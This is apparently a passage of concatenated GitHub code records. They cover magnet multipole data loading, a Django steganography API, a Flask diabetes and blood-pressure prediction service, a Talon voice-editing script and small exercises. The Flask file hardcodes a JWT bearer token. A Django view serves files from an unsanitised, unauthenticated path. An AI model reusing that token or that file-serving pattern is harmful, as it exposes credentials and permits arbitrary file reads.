self.Data[i].Raw[index_multipoles:index_multipoles+15]\n multipoles = np.array([])\n for value in multipoles_str:\n multipoles = np.append(multipoles, value.split('\\t'))\n self.Data[i].multipoles = multipoles.reshape(15, 13).astype(np.float64)\n self.Data[i].magnet_type = np.nonzero(self.Data[i].multipoles[:, 7])[0][0]\n self.Data[i].columns_names = np.array(self.Data[i].Raw[index + 2].split('\\t'))\n self.Data[i].reference_radius = float(\n self.Data[i].Raw[index + 2].split(\"@\")[1].split(\"mm\")[0])/1000\n else:\n message = (\n 'Failed to read multipoles from file: \\n\\n\"%s\"' %\n self.Data[i].file)\n raise DataFileError(message)\n \n ### Getting Raw data ###\n index = self._search_in_file_lines(self.Data[i].Raw, 'Raw Data Stored', 'Dados Brutos')\n if index is not None:\n curves_str = self.Data[i].Raw[index+3:]\n curves = np.array([])\n for value in curves_str:\n curves = np.append(curves, value[:-1].split('\\t'))\n self.Data[i].curves = curves.reshape(\n int(len(curves_str)),\n int(len(curves)/len(curves_str))).astype(np.float64)*1e-12\n else:\n message = (\n 'Failed to read raw data from file: \\n\\n\"%s\"' % self.Data[i].file)\n raise DataFileError(message)\n \n self._create_data_frames()\n \n def _create_data_frames(self):\n n = len(self.files)\n i=0\n for i in range (n):\n if (self.Data[i].multipoles is None or self.Data[i].curves is None or\n self.Data[i].columns_names is None):\n return\n\n index = np.char.mod('%d', np.linspace(1, 15, 15))\n self.Data[i].multipoles_df = pd.DataFrame(\n self.Data[i].multipoles, columns=self.Data[i].columns_names, index=index)\n\n _npoints = self.Data[i].curves.shape[0]\n _ncurves = self.Data[i].curves.shape[1]\n index = np.char.mod('%d', np.linspace(1, _npoints, _npoints))\n columns = np.char.mod('%d', np.linspace(1, _ncurves, _ncurves))\n self.Data[i].curves_df = pd.DataFrame(\n self.Data[i].curves, index=index, columns=columns)\n \n def _calc_offsets(self):\n n = len(self.files)\n i=0\n for i in range (n):\n if self.Data[i].multipoles is None or self.Data[i].magnet_type is None:\n return\n if self.Data[i].magnet_type != 0:\n n = self.Data[i].magnet_type\n normal = self.Data[i].multipoles[:, 1]\n normal_err = self.Data[i].multipoles[:, 2]\n skew = self.Data[i].multipoles[:, 3]\n skew_err = self.Data[i].multipoles[:, 4]\n\n self.Data[i].offset_x = normal[n-1]/(n*normal[n])\n self.Data[i].offset_x_err = (\n ((normal_err[n-1]/(n*normal[n]))**2 -\n (normal[n-1]*normal_err[n]/(n*(normal[n]**2)))**2)**(1/2))\n\n self.Data[i].offset_y = skew[n-1]/(n*normal[n])\n self.Data[i].offset_y_err = (\n ((skew_err[n-1]/(n*normal[n]))**2 -\n (skew[n-1]*normal_err[n]/(n*(normal[n]**2)))**2)**(1/2))\n else:\n self.Data[i].offset_x = 0\n self.Data[i].offset_x_err = 0\n self.Data[i].offset_y = 0\n self.Data[i].offset_y_err = 0\n \n def _set_roll(self):\n n = len(self.files)\n i=0\n for i in range (n):\n if self.Data[i].multipoles is None or self.Data[i].magnet_type is None:\n return\n self.Data[i].roll = self.Data[i].multipoles[self.Data[i].magnet_type, 7]\n self.Data[i].roll_err = self.Data[i].multipoles[self.Data[i].magnet_type, 8]\n \n def calc_residual_field(self, pos):\n \"\"\"Calculate residual field.\n\n Args:\n pos (array): transversal position values [m].\n\n Returns:\n residual_normal (array): normal residual field [T].\n residual_skew (array): skew residual field [T].\n \"\"\"\n n = len(self.files)\n i=0\n for i in range (n):\n if self.Data[i].multipoles is None or self.Data[i].magnet_type is None:\n return None, None\n\n n = self.Data[i].magnet_type\n nr_harmonics = self.Data[i].multipoles.shape[0]\n\n nrpts = len(pos)\n residual_normal = np.zeros(nrpts)\n residual_skew = np.zeros(nrpts)\n\n normal = self.Data[i].multipoles[:, 1]\n skew = self.Data[i].multipoles[:, 3]\n\n for i in range(nrpts):\n for m in range(n+1, nr_harmonics):\n residual_normal[i] += (normal[m]/normal[n])*(pos[i]**(m - n))\n residual_skew[i] += (skew[m]/normal[n])*(pos[i]**(m - n))\n\n return residual_normal, residual_skew\n \n def calc_residual_multipoles(self, pos):\n \"\"\"Calculate residual field multipoles.\n\n Args:\n pos (array): transversal position values [m].\n\n Returns:\n residual_mult_normal (array): normal residual multipoles table.\n residual_mult_skew (array): skew residual multipoles table.\n \"\"\"\n n = len(self.files)\n i=0\n for i in range (n):\n if self.Data[i].multipoles is None or self.Data[i].magnet_type is None:\n return None, None\n\n n = self.Data[i].magnet_type\n nr_harmonics = self.Data[i].multipoles.shape[0]\n\n nrpts = len(pos)\n residual_mult_normal = np.zeros([nr_harmonics, nrpts])\n residual_mult_skew = np.zeros([nr_harmonics, nrpts])\n\n normal = self.Data[i].multipoles[:, 1]\n skew = self.Data[i].multipoles[:, 3]\n\n for i in range(nrpts):\n for m in range(n+1, nr_harmonics):\n residual_mult_normal[m, i] = (\n normal[m]/normal[n])*(pos[i]**(m - n))\n residual_mult_skew[m, i] = (\n skew[m]/normal[n])*(pos[i]**(m - n))\n\n return residual_mult_normal, residual_mult_skew","repo_name":"LucasIB/Machine-Learning-for-Rotating-Coil-Magnetic-Measurements","sub_path":"load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":14281,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"10169118668","text":"import mimetypes\nimport os\nfrom urllib.parse import unquote\nfrom wsgiref.util import FileWrapper\n\nfrom django.conf import settings\nfrom django.http import FileResponse, HttpResponse\nfrom rest_framework import status, viewsets\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.mixins import (CreateModelMixin, ListModelMixin,\n RetrieveModelMixin)\nfrom rest_framework.parsers import MultiPartParser\nfrom rest_framework.response import Response\n\nfrom .core import Steganography\nfrom .models import Image, ImageHidden\nfrom .serializers import (ImageHiddenListSerializer, ImageHiddenSerializer,\n ImageListSerializer, ImageSerializer,\n RequestImageHiddenSerializer)\n\nsteganography = Steganography()\n\n\nclass ImageViewSet(\n ListModelMixin,\n CreateModelMixin,\n RetrieveModelMixin,\n viewsets.GenericViewSet,\n):\n queryset = Image.objects.all()\n serializer_class = ImageSerializer\n parser_classes = (MultiPartParser,)\n\n def get_serializer(self, *args, **kwargs):\n if self.action == \"create\":\n return ImageSerializer(*args, **kwargs)\n return ImageListSerializer(\n *args, **kwargs, context={\"request\": self.request}\n )\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n response_data = serializer.save()\n headers = self.get_success_headers(serializer.data)\n response = {\n \"id\": response_data.id,\n \"url\": f\"/image/{response_data.id}\",\n \"message\": \"Image uploaded successfully\",\n }\n return Response(\n response, status=status.HTTP_201_CREATED, headers=headers\n )\n\n def retrieve(self, request, *args, **kwargs):\n queryset = Image.objects.get(id=kwargs[\"pk\"])\n file_handle = queryset.image.path\n with open(file_handle, \"rb\") as file:\n response = HttpResponse(\n FileWrapper(file), content_type=\"image/bmp\"\n )\n response[\"Content-Disposition\"] = (\n \"attachment; filename=original_\" + queryset.image.name\n )\n return response\n\n\nclass EncodeViewSet(CreateModelMixin, viewsets.GenericViewSet):\n queryset = ImageHidden.objects.all()\n serializer_class = RequestImageHiddenSerializer\n\n def create(self, request, *args, **kwargs):\n pk_original_image = request.data[\"image\"]\n message = request.data[\"message\"]\n image_original = Image.objects.get(id=pk_original_image)\n url_image = image_original.image.path\n encoded_image = steganography.encode(url_image, message)\n data = {\n \"image\": image_original.id,\n \"image_hidden\": encoded_image,\n }\n serializer = ImageHiddenSerializer(data=data)\n serializer.is_valid(raise_exception=True)\n response_data = serializer.save()\n headers = self.get_success_headers(serializer.data)\n response = {\n \"id\": response_data.id,\n \"message\": \"Image encoded successfully\",\n }\n\n return Response(\n response,\n status=status.HTTP_201_CREATED,\n headers=headers,\n )\n\n\nclass DecodeViewSet(\n ListModelMixin, RetrieveModelMixin, viewsets.GenericViewSet\n):\n queryset = ImageHidden.objects.all()\n serializer_class = ImageHiddenSerializer\n\n def get_serializer(self, *args, **kwargs):\n if self.action == \"list\":\n return ImageHiddenListSerializer(\n *args, **kwargs, context={\"request\": self.request}\n )\n return ImageHiddenSerializer(*args, **kwargs)\n\n def retrieve(self, request, *args, **kwargs):\n obj = self.get_object()\n url_image = obj.image_hidden\n message_decoded = steganography.decode(url_image)\n base_url = request.build_absolute_uri().replace(\n request.get_full_path(), '/'\n )\n image_original = request.build_absolute_uri(obj.image.image.url)\n data = {\n \"id\": obj.id,\n \"image_original\": image_original,\n \"image_hidden\": base_url + str(obj.image_hidden),\n 'message': message_decoded,\n }\n return Response(\n data, status=status.HTTP_200_OK\n )\n\n\n@api_view([\"GET\"])\n@permission_classes([])\ndef get_media_path(request, path):\n if not os.path.exists(f\"{settings.MEDIA_ROOT}/{path}\"):\n return Response(\"No such file exists.\", status=404)\n\n mimetype, encoding = mimetypes.guess_type(path, strict=True)\n if not mimetype:\n mimetype = \"text/html\"\n file_path = unquote(os.path.join(settings.MEDIA_ROOT, path)).encode(\n \"utf-8\"\n )\n return FileResponse(open(file_path, \"rb\"), content_type=mimetype)\n","repo_name":"wendryosales/steganography","sub_path":"backend/steganography/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4898,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"41779332878","text":"# Write a function that given a string of characters, returns the longest word in the sentence.\n\n\ndef longest_Word(sentence):\n longestWord = \"\"\n if \" \" not in sentence:\n return sentence\n else:\n split = sentence.split(\" \")\n print(split)\n for word in split:\n if(len(word) > len(longestWord)):\n longestWord = word\n return longestWord\n\n\nprint(longest_Word(\"Not so long sentence.\"))\n","repo_name":"ChildishhAlbino/Daily-Coding-Problems-Solutions","sub_path":"Misc/Longest Word.py","file_name":"Longest Word.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18470848717","text":"#!/bin/env python3\n\nimport logging\nfrom typing import Any\n\nimport pint\n\nlog = logging.getLogger(__name__)\n\n\nureg = pint.UnitRegistry(\n preprocessors=[\n lambda s: s.replace(\"%\", \"percent\"),\n lambda s: s.replace(\"%%\", \"permille\"),\n ]\n)\n\nureg.define(\"micro- = 10**-6 = mc- = μ-\")\nureg.define(\"percent = 0.01 = %\")\nureg.define(\"permille = 0.001 = %%\")\n\n\nureg.define(\"cup = 2*dl\")\n\n# NOTE: Not sure if this is correct? But gets rid of the warnings...\nureg.define(\"x = count\")\nureg.define(\"IU = x\") # for now\nureg.define(\"CFU = x\") # for now\nureg.define(\"unknown = x\") # for now\nureg.define(\"serving = x\") # for now\nureg.define(\"puff = x\") # for now\nureg.define(\"puffs = x\") # for now\n\nureg.define(\"B = 10**9 * x\") # for noting billions of CFU, for example\n\n# The type here is because mypy doesn't like this dynamically created type\nQ_: Any = ureg.Quantity\n\n\nclass Dose:\n def __init__(self, substance: str, amount: str | Q_) -> None:\n self.substance: str = substance\n if not isinstance(amount, ureg.Quantity):\n self.quantity = Q_(amount)\n else:\n self.quantity = amount\n\n def __str__(self) -> str:\n return f\"{self.amount_with_unit} {self.substance}\"\n\n @property\n def amount(self) -> float:\n # return the amount as a float, in the base unit (kg for mass, L for volumes)\n return self.quantity.to_base_units().magnitude\n\n @property\n def amount_with_unit(self) -> str:\n if not self.quantity.units:\n return str(round(self.quantity))\n q = self.quantity.to_compact()\n # print(q)\n amount = q.magnitude\n amount = round(amount) if round(amount, 8) % 1.0 == 0 else amount\n return f\"{amount}{q.units:~P}\"\n\n def __repr__(self):\n return f\"\"\n\n def __add__(self, other: \"Dose\") -> \"Dose\":\n if self.quantity.units.dimensionality != other.quantity.units.dimensionality:\n # if quantity of either is 0, we skip it\n if self.quantity.magnitude == 0:\n return other\n if other.quantity.magnitude == 0:\n return self\n raise ValueError(\n f\"Cannot add doses with different units: {self.quantity.units} and {other.quantity.units} (for {self} and {other})\"\n )\n assert self.substance.lower() == other.substance.lower()\n return Dose(self.substance, self.quantity + other.quantity)\n\n def __truediv__(self, b):\n return Dose(self.substance, self.quantity / b)\n\n def __lt__(self, other):\n return self.quantity < other.quantity\n\n def __eq__(self, other):\n return (\n self.substance == other.substance\n and round((self.quantity - other.quantity).magnitude, 12) == 0\n )\n\n\ndef test_amount_with_unit():\n d = Dose(\"L\", \"100 mcg\")\n assert d.amount_with_unit == \"100mcg\"\n\n\ndef test_amount_unitless():\n d = Dose(\"Candy\", \"10x\")\n assert d.amount_with_unit == \"10x\"\n\n\ndef test_amount_iu():\n d = Dose(\"Vitamin D\", \"5000 IU\")\n assert d.amount_with_unit == \"5kIU\"\n\n\ndef test_amount_cfu():\n d = Dose(\"CFU\", \"7B\")\n assert d.amount_with_unit == \"7B\"\n","repo_name":"ErikBjare/QSlang","sub_path":"qslang/dose.py","file_name":"dose.py","file_ext":"py","file_size_in_byte":3181,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"13115526692","text":"import sys\nfrom collections import deque\n\ninput = sys.stdin.readline\nn, m = map(int, input().split())\ngraph, visited = [], []\ntime, now, cnt = 0, 2, [] # 총 시간, 현재 치즈 녹는 거 표시, 개수\n\ndx = [0, 0, -1, 1]\ndy = [-1, 1, 0, 0]\n\nfor _ in range(n):\n graph.append(list(map(int, input().split())))\n visited.append([0] * m)\n\ndef bfs(x, y, v):\n cnt = 0\n q = deque()\n q.append((x, y))\n while q:\n x, y = q.popleft()\n for i in range(4):\n nx, ny = x + dx[i], y + dy[i]\n if 0 <= nx < m and 0 <= ny < n:\n if graph[ny][nx] == -1 and visited[ny][nx] != v:\n if graph[y][x] != -1:\n cnt += 1\n graph[y][x] = -1\n if graph[ny][nx] == 1 and visited[ny][nx] != v:\n visited[ny][nx] = v\n q.append((nx, ny))\n return cnt\n\n# 바깥부분 = -1\ndef hole(x, y, v): \n flag = False\n q = deque()\n q.append((x, y))\n while q:\n x, y = q.popleft()\n for i in range(4):\n nx, ny = x + dx[i], y + dy[i]\n if 0 <= nx < m and 0 <= ny < n:\n if graph[ny][nx] == -1:\n flag = True\n if graph[ny][nx] == 0 and visited[ny][nx] != v:\n visited[ny][nx] = v\n if v == -1:\n graph[ny][nx] = -1\n q.append((nx, ny))\n return flag\n\nhole(0, 0, -1)\nwhile True:\n flag = 0\n cnt.append(0)\n\n for i in range(n):\n for j in range(m):\n if graph[i][j] == 0:\n if hole(j, i, now):\n hole(j, i, -1)\n \n for i in range(n):\n for j in range(m):\n if graph[i][j] == 1:\n flag = 1\n cnt[-1] += bfs(j, i, now)\n if not flag: break \n now += 1\n time += 1\n\n\nprint(time)\nprint(cnt[-2])","repo_name":"olive-su/1day_1Algorithm","sub_path":"22.06_PS/0611_치즈.py","file_name":"0611_치즈.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9633571859","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, redirect\n\n# Create your views here.\nfrom django.urls import reverse\n\nfrom account.models import Follow, Profile\nfrom post.models import Post, Like\n\n\n@login_required\ndef viewpost(request):\n following_list = Follow.objects.filter(follower=request.user)\n feed = Post.objects.filter(author__in=following_list.values_list('following'))\n liked_post = Like.objects.filter(user=request.user)\n liked_post_list = liked_post.values_list('post', flat=True)\n return render(request, 'post/ViewPost.html', context={'feed': feed, 'liked_post_list': liked_post_list})\n\n\n@login_required\ndef like(request, pk):\n post = Post.objects.get(pk=pk)\n already_like = Like.objects.filter(post=post, user=request.user)\n if not already_like:\n liked_post = Like(post=post, user=request.user)\n liked_post.save()\n return redirect(reverse('viewpost'))\n\n\n@login_required\ndef unlike(request, pk):\n post = Post.objects.get(pk=pk)\n already_like = Like.objects.filter(post=post, user=request.user)\n already_like.delete()\n return redirect(reverse('viewpost'))\n","repo_name":"Rolleex/Social","sub_path":"social/post/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16864431829","text":"import numpy as np\n\n# Class for layers in neural network\nclass Neural_Layer(object):\n '''\n Structure of data\n n_connections As many as neurons in previous layer\n n_neurons Neurons in actual layer\n activation_f Activation function for neurons in layer\n bias As many as neurons in actual layer\n '''\n def __init__(self, n_connections, n_neurons, activation_f):\n self.activation_f = activation_f\n # * 2 - 1 is used to get values in range (-1, 1)\n self.bias = np.random.rand(1, n_neurons) * 2 - 1\n self.weights = np.random.rand(n_connections, n_neurons) * 2 - 1 \n","repo_name":"RamiroG8k/NN-Dynamic-AF","sub_path":"neural_layer.py","file_name":"neural_layer.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24694626223","text":"__author__ = \"Vanessa Sochat\"\n__copyright__ = \"Copyright 2022, Vanessa Sochat\"\n__license__ = \"MPL 2.0\"\n\n\nimport abc\nimport importlib\nimport inspect\nimport os\nimport re\nfrom collections.abc import Mapping\n\nimport jsonschema\nimport requests\n\nfrom action_updater.logger import logger\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\n\nclass UpdaterFinder(Mapping):\n \"\"\"\n Create a cache of available updaters.\n \"\"\"\n\n _updaters = {}\n\n def __init__(self):\n \"\"\"\n Instantiate an updater\n \"\"\"\n self.collection_path = os.path.join(here, \"updaters\")\n self.load()\n\n def __getitem__(self, name):\n return self._updaters.get(name)\n\n def __iter__(self):\n return iter(self._updaters)\n\n def __len__(self):\n return len(self._updaters)\n\n def load(self):\n \"\"\"\n Load new updaters\n \"\"\"\n self._updaters = self._load_updaters()\n\n def _load_updaters(self):\n \"\"\"\n Load updaters based on listing folders in the collection.\n \"\"\"\n lookup = {}\n for name in os.listdir(self.collection_path):\n updater_dir = os.path.join(self.collection_path, name)\n updater_file = os.path.join(updater_dir, \"update.py\")\n\n # Skip files in collection folder\n if os.path.isfile(updater_dir):\n continue\n\n # Continue if the file doesn't exist\n if not os.path.exists(updater_file):\n logger.debug(\"%s does not appear to have an update.py, skipping.\" % updater_dir)\n continue\n\n # The class name means we split by underscore, capitalize, and join\n class_name = \"\".join([x.capitalize() for x in name.split(\"_\")]) + \"Updater\"\n module = \"action_updater.main.updaters.%s.update\" % name\n\n # Not instantiated - will be instantiated for a specific action\n lookup[name] = getattr(importlib.import_module(module), class_name)\n return lookup\n\n\nclass UpdaterBase:\n\n name = \"updater\"\n description = \"An abstract base updater.\"\n date_time_format = \"%Y-%m-%dT%H:%M:%S%z\"\n\n # The default updater is not intended for static files\n static_files = False\n\n def __init__(self, token, settings=None):\n self._data = {}\n self.headers = {}\n self.update_token(token)\n self.count = 0\n\n # Each updater can ship its own settings schema\n if not hasattr(self, \"schema\"):\n self.schema = {}\n\n self.validate_settings(settings)\n\n @abc.abstractmethod\n def detect(self, *args, **kwargs):\n pass\n\n @property\n def slug(self):\n return re.sub(\"(-|_)\", \"\", self.name)\n\n @property\n def title(self):\n return self.name.capitalize()\n\n def validate_settings(self, settings):\n \"\"\"\n If settings are provided (and the updater has a schema) ensure we validate.\n \"\"\"\n self.global_settings = settings or {}\n if self.global_settings and self.schema:\n jsonschema.validate(self.settings, schema=self.schema)\n\n @property\n def settings(self):\n \"\"\"\n Get settings specific to updater\n \"\"\"\n return self.global_settings.updaters.get(self.name, {})\n\n def update_token(self, token=None):\n \"\"\"\n Set token and headers, if found\n \"\"\"\n self.token = token or os.environ.get(\"GITHUB_TOKEN\")\n if self.token:\n self.headers[\"Authorization\"] = \"token %s\" % self.token\n\n @property\n def classpath(self):\n return os.path.dirname(inspect.getfile(self.__class__))\n\n def get_releases(self, repo):\n \"\"\"\n Get the lateset release of an action (under flux-framework)\n \"\"\"\n return self.get_request(f\"{self.global_settings.github_api}/repos/{repo}/releases\")\n\n def get_tags(self, repo):\n \"\"\"\n Get the lateset tags for a repository\n \"\"\"\n return self.get_request(f\"{self.global_settings.github_api}/repos/{repo}/git/refs/tags\")\n\n def get_tags_lookup(self, repo):\n \"\"\"\n This isn't required to be sploot out, but it's easier to debug / read if necessary\n \"\"\"\n tags = {}\n for t in self.get_tags(repo):\n if \"ref\" not in t or \"refs/tags\" not in t[\"ref\"]:\n continue\n tags[re.sub(\"refs/tags/\", \"\", t[\"ref\"])] = t\n return tags\n\n def get_request(self, url):\n \"\"\"\n Perform a GitHub get request (assume pagination)\n \"\"\"\n response = requests.get(url, headers=self.headers, params={\"per_page\": 100})\n\n try:\n response.raise_for_status()\n except Exception:\n # Set a warning about limtis without tokens!\n if not self.token:\n logger.exit(\"export GITHUB_TOKEN to increase API limits.\")\n\n # latest release should be first in this set\n return response.json()\n","repo_name":"vsoch/action-updater","sub_path":"action_updater/main/updater.py","file_name":"updater.py","file_ext":"py","file_size_in_byte":4930,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"16669075960","text":"import numpy as np\nfrom flask import Flask, abort, jsonify, request\nimport pickle as pickle\n\nimport numpy as np\nimport base64\n\nfrom flask import Flask, request, render_template, make_response\nfrom sklearn.externals import joblib\nfrom io import BytesIO\nfrom skimage import io as skio\nfrom skimage.transform import resize\nfrom flask import Flask, render_template\nimport requests\nimport json\nimport sys\n##############################################\n###-CARREGO MEU MODELO DE APRENDIZAGEM AQUI-##\n##############################################\nmy_knn = pickle.load(open('analytics_folder/knn.pkl', 'rb'))\n\ndiabetes_model = pickle.load(open('analytics_folder/diabetes.pkl', 'rb')) \napp = Flask(__name__)\n\n##############################################\n################ -API HOME - #################\n##############################################\n@app.route('/home')\n\ndef home():\n return (\"Página Ínicial\")\n\n###############################################\n############## -ROTA SWAGGER - ################\n###############################################\n\n\n \n###############################################\n# ROTA (POST) QUE RECEBE OS ATRIBUTOS ESPERADOS DO MODELO DE APRENDIZAGEM DEFINIDO E RETORNA A PREDIÇÃO FEITA POR ELE\n@app.route('/pressao', methods=['POST'])\n\ndef make_predict(): #10.0.0.102\n if request.method == 'POST':\n try:\n data = request.get_json(force=True)\n predict_request = [data['Batimentos'], data['Calorias']]\n \n except ValueError:\n return jsonify(\"Por favor, coloque um valor para batimentos e calorias: \")\n \n predict_request = np.array(predict_request)\n predict_request = predict_request.reshape(1,-1)\n\n y_hat = my_knn.predict(predict_request) #retorna o resulta em JSON\n\n output = [y_hat[0]]\n \n #return jsonify(my_knn.predict(predict_request).tolist()) #Transforma o resultado JSON em uma lista\n \n def result(m):\n if m[0] == 0:\n return \"Sua Pressao esta normal\"\n \n elif m[0] == 1:\n return \"Sua Pressao esta muito Baixa\"\n \n elif m[0] == 2:\n return \"Sua Pressao esta muito Alta\"\n \n output = result(output)\n return jsonify(results=output)\n###############################################\n\n\n# ROTA (POST) QUE RECEBE OS ATRIBUTOS ESPERADOS DO MODELO DE APRENDIZAGEM DEFINIDO E RETORNA A PREDIÇÃO FEITA POR ELE\n@app.route('/diabetes', methods=['POST'])\n\ndef make_predict2(): #10.0.0.102\n if request.method == 'POST':\n try:\n data = request.get_json(force=True)\n #predict_request = [data['Pregnancies'], data['Glucose'], data['BloodPressure'], data['SkinThickness'], data['Insulin'], data['BMI'], data['DiabetesPedigreeFunction'], data['Age']]\n predict_request = [data['Glucose'], data['BloodPressure'], data['Insulin'], data['BMI'], data['Age']]\n \n except ValueError:\n return jsonify(\"Valores inadequados! \")\n \n predict_request = np.array(predict_request)\n predict_request = predict_request.reshape(1,-1)\n\n y_hat2 = diabetes_model.predict(predict_request) #retorna o resulta em JSON\n\n output2 = [y_hat2[0]]\n \n #return jsonify(my_knn.predict(predict_request).tolist()) #Transforma o resultado JSON em uma lista\n \n def result(m):\n if m[0] == 0:\n return \"Sem Diabetes\"\n \n elif m[0] == 1:\n return \"Diabetes\"\n \n \n output2 = result(output2)\n return jsonify(results=output2)\n###############################################\n\n\n# A route to return all of the available entries in our catalog.\n@app.route('/hanUser', methods=['GET'])\ndef api_all():\n\tparams = {\n 'api_key': '{eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJfaWQiOiI1YWNjYjZkYTM3MzNjZDAwMTQ5MTZjNTAifQ.1gJH3Y0u9vmXcYQsMx-OmqqFL2rQfTZlYF9L4r9bXO0}',\n }\n\tr = requests.get('https://haniot-api.herokuapp.com/api/v1/measurements/types/3?period=3w', headers={'Authorization': 'JWT eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJfaWQiOiI1YWNjYjZkYTM3MzNjZDAwMTQ5MTZjNTAifQ.1gJH3Y0u9vmXcYQsMx-OmqqFL2rQfTZlYF9L4r9bXO0'})\n\t#r = get_json(r.text)\n\tr = r.text\n\n\treturn r\n\n###############################################\n################# -TESTES- ####################\n###############################################\n@app.route('/diabeteTeste')\ndef teste():\n\twith app.test_client() as c:\n\t rv = c.post('/diabetes', json={\n\t 'Glucose': 999, 'BloodPressure': 999, 'Insulin': 100, 'BMI': 14, 'Age': 11\n\t \n\t })\n\t print(rv, file=sys.stderr)\n\t return rv\n\n@app.route('/pressaoTeste')\ndef teste2():\n\twith app.test_client() as c:\n\t rv = c.post('/pressao', json={\n\t 'Batimentos': 35, 'Calorias': 35\n\t \n\t })\n\t print(rv, file=sys.stderr)\n\t return rv\n\n@app.route('/aquisicaoTeste')\ndef teste3():\n\twith app.test_client() as c:\n\t resp = c.get('/hanUser')\n\t print(resp, file=sys.stderr)\n\t return resp\n############################################################\n\nif __name__ == '__main__':\n\tapp.run(host= '0.0.0.0', port=33)","repo_name":"EduBrQ/Nutes-MachineLearning","sub_path":"srv.py","file_name":"srv.py","file_ext":"py","file_size_in_byte":5067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"44278439624","text":"# https://github.com/JonathanNickerson/talon_voice_user_scripts\n\nimport time\n\nimport talon.clip as clip\nfrom talon.voice import Key, press, Str, Context\nfrom ..utils import (\n parse_words,\n join_words,\n is_not_vim,\n numeral_list,\n extract_num_from_m,\n)\n\nctx = Context(\"generic_editor\", func=is_not_vim)\nctx.set_list(\"n\", numeral_list)\n\n\ndef find_next(m):\n press(\"cmd-f\")\n Str(str(m.dgndictation[0]._words[0]))(None)\n press(\"escape\")\n\n\ndef find_previous(m):\n press(\"left\")\n press(\"cmd-f\")\n Str(str(m.dgndictation[0]._words[0]))(None)\n press(\"cmd-shift-g\")\n press(\"escape\")\n\n\n# jcooper-korg from talon slack\ndef select_text_to_left_of_cursor(m):\n words = parse_words(m)\n if not words:\n return\n old = clip.get()\n key = join_words(words).lower()\n press(\"shift-home\", wait=2000)\n press(\"cmd-c\", wait=2000)\n press(\"right\", wait=2000)\n text_left = clip.get()\n clip.set(old)\n result = text_left.find(key)\n if result == -1:\n return\n # cursor over to the found key text\n for i in range(0, len(text_left) - result):\n press(\"left\", wait=0)\n # now select the matching key text\n for i in range(0, len(key)):\n press(\"shift-right\")\n\n\n# jcooper-korg from talon slack\ndef select_text_to_right_of_cursor(m):\n words = parse_words(m)\n if not words:\n return\n key = join_words(words).lower()\n old = clip.get()\n press(\"shift-end\", wait=2000)\n press(\"cmd-c\", wait=2000)\n press(\"left\", wait=2000)\n text_right = clip.get()\n clip.set(old)\n result = text_right.find(key)\n if result == -1:\n return\n # cursor over to the found key text\n for i in range(0, result):\n press(\"right\", wait=0)\n # now select the matching key text\n for i in range(0, len(key)):\n press(\"shift-right\")\n\n\nalphanumeric = \"abcdefghijklmnopqrstuvwxyz0123456789_\"\n\n\ndef big_word_neck(m):\n return word_neck(m, valid_characters=set(alphanumeric) | set(\"/\\\\-_.>=<\"))\n\n\ndef small_word_neck(m):\n return word_neck(m, valid_characters=set(alphanumeric) - set(\"_\"))\n\n\ndef word_neck(m, valid_characters=alphanumeric):\n word_index = extract_num_from_m(m, 1)\n\n old = clip.get()\n press(\"shift-right\", wait=2000)\n press(\"cmd-c\", wait=2000)\n press(\"shift-left\", wait=2000)\n current_highlight = clip.get()\n if len(current_highlight) > 1:\n press(\"right\", wait=2000)\n press(\"shift-end\", wait=2000)\n time.sleep(0.25)\n press(\"cmd-c\", wait=2000)\n press(\"left\", wait=2000)\n time.sleep(0.25)\n text_right = clip.get().lower()\n clip.set(old)\n\n is_word = [character in valid_characters for character in text_right]\n word_count = 1\n i = 0\n while i < (len(is_word) - 1) and not is_word[i]:\n i += 1\n\n # print(\"a start\", i)\n\n while i < (len(is_word) - 1) and word_count < word_index:\n # print(i, is_word[i], word_count, word_index)\n if not is_word[i] and is_word[i + 1]:\n word_count += 1\n i += 1\n # warning: this is a hack, sorry\n # print(\"i\", i)\n if i == 1 and is_word[0]:\n i = 0\n start_position = i\n # print(text_right[start_position:])\n while i < len(is_word) and is_word[i]:\n i += 1\n end_position = i\n\n # print(start_position, end_position)\n # cursor over to the found word\n for i in range(0, start_position):\n press(\"right\", wait=0)\n # now select the word\n for i in range(0, end_position - start_position):\n press(\"shift-right\")\n\n\ndef big_word_prev(m):\n return word_prev(m, valid_characters=set(alphanumeric) | set(\"/\\\\-_.>=<\"))\n\n\ndef small_word_prev(m):\n return word_prev(m, valid_characters=set(alphanumeric) - set(\"_\"))\n\n\ndef word_prev(m, valid_characters=alphanumeric):\n word_index = extract_num_from_m(m, 1)\n\n old = clip.get()\n press(\"shift-right\", wait=2000)\n press(\"cmd-c\", wait=2000)\n press(\"shift-left\", wait=2000)\n current_highlight = clip.get()\n if len(current_highlight) > 1:\n press(\"left\", wait=2000)\n press(\"shift-home\", wait=2000)\n time.sleep(0.25)\n press(\"cmd-c\", wait=2000)\n press(\"right\", wait=2000)\n time.sleep(0.25)\n text_right = clip.get().lower()\n clip.set(old)\n\n text_right = 